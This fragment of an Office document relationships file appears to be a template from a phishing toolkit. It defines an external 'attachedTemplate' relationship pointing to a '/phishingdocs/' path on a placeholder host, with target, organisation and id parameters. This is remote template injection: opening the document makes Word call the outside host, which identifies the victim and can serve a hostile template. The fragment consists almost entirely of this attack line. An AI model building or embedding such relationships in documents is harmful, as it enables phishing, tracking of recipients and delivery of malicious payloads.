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99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VALUE://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URLVALUE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                <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
                        <Relationship Id="rId9999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
                        Target="HTTPVALUE://URLVALUE/phishingdocs/?target=TARGETVALUE&amp;org=ORGVALUE&amp;id=IDVALUE"
                        TargetMode="External"/>
                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